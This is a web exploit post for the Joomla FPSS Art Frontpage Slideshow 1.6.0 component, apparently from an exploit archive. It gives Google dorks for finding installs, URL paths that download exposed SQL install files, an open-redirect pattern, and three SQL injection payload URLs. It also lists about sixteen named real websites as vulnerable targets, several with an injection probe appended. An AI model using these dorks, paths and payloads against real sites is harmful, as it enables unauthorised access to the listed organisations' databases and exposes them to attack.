Joomla FPSS Art Frontpage Slideshow 1.6.0 Database Disclose / SQL Injection

Joomla FPSS Art Frontpage Slideshow component version 1.6.0 suffers from database disclosure, open redirection, and remote SQL injection vulnerabilities.


MD5 | c7925f2e6adc722858e2041ca26bb11e

####################################################################################################

# Exploit Title : Joomla FPSS Art Frontpage Slideshow Components 1.6.0
Database Disclosure / Open Redirection / SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/01/2019
# Vendor Homepage : artetics.com
# Software Information Link :
joomlaworks.net/extensions/commercial/frontpage-slideshow
# Software Download Link :
extensions.joomla.org/extension/art-frontpage-slideshow/
# Affected Versions : 1.5.3 and 1.6.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/index.php?option=com_fpss
inurl:''/administrator/components/com_fpss/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command
('SQL Injection') ]

####################################################################################################

Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure /
Open Redirection / SQL Injection

####################################################################################################

# Description :
*************

Art Frontpage Slideshow is a slideshow module that adds front end animation
that attracts visitors and allows to show images of featured products
and news in a nice eye-catching way.

####################################################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_fpss/fpss.sql
/administrator/components/com_fpss/install.mysql.sql
/administrator/components/com_fpss/install.mysql.sql

# Open Redirection Exploit :
*************************

/index.php?option=com_fpss&task=track&id=[ID-NUMBER]&url=[SITE-ADDRESS]

# SQL Injection Exploit :
***********************
/index.php?option=com_fpss&task=module&id=[ID-NUMBER]&format=feed&type=[SQL
Injection]

/index.php?option=com_fpss&task=module&id=[ID-NUMBER]
&format=feed&type=atom&lang=[SQL Injection]

/index.php?option=com_fpss&view=article&id=[ID-NUMBER]
:article-[ARTICLE-NUMBER]&catid=[ID-NUMBER]:articles&Itemid=[SQL Injection]

####################################################################################################

# Example Vulnerable Sites :
*************************

[+]
kancelarija.org.mk/index.php?option=com_fpss&task=module&id=87&format=feed&type=atom&lang=1%27

[+]
spalya.com.mx/index.php?option=com_fpss&view=article&id=282:article-3&catid=41:articles&Itemid=450%27

[+]
uaddigital.com/main/index.php?option=com_fpss&task=module&id=27&format=feed&type=1%27

[+] cvbsaude.org/administrator/components/com_fpss/install.mysql.sql

[+] bio.demokritos.gr/new_site/administrator/components/com_fpss/fpss.sql

[+] akademisinergi.com/administrator/components/com_fpss/install.mysql.sql

[+] studioscosta.gr/tmp/administrator/components/com_fpss/install.mysql.sql

[+]
fupacnl.com.br/picture_library/administrator/components/com_fpss/install.mysql.sql

[+]
pathfinderindemnity.com/administrator/components/com_fpss/install.mysql.sql

[+]
alkartasunalizeoa.eus/administrator/components/com_fpss/install.mysql.sql

[+]
muslimfamilyservices.org/site/administrator/components/com_fpss/install.mysql.sql

[+] shswadsworth.org/administrator/components/com_fpss/install.mysql.sql

[+] tjnisseki.com/administrator/components/com_fpss/install.mysql.sql

[+] telecomreviewna.com/administrator/components/com_fpss/install.mysql.sql

[+] waterpng.com.pg/site/administrator/components/com_fpss/install.mysql.sql

[+] marinelog.com/administrator/components/com_fpss/install.mysql.sql

####################################################################################################

# Example SQL Database Error :

Warning: session_start() [function.session-start]: Cannot send session
cookie -
headers already sent by (output started at
/home/content/64/4351964/html/configuration.php:1)
in /home/content/64/4351964/html/libraries/joomla/session/session.php on
line 423

Strict Standards: Non-static method JLoader::import() should
not be called statically in /home/uadvirtual/public_html/main
/libraries/joomla/import.php on line 29

####################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################################################

Related Posts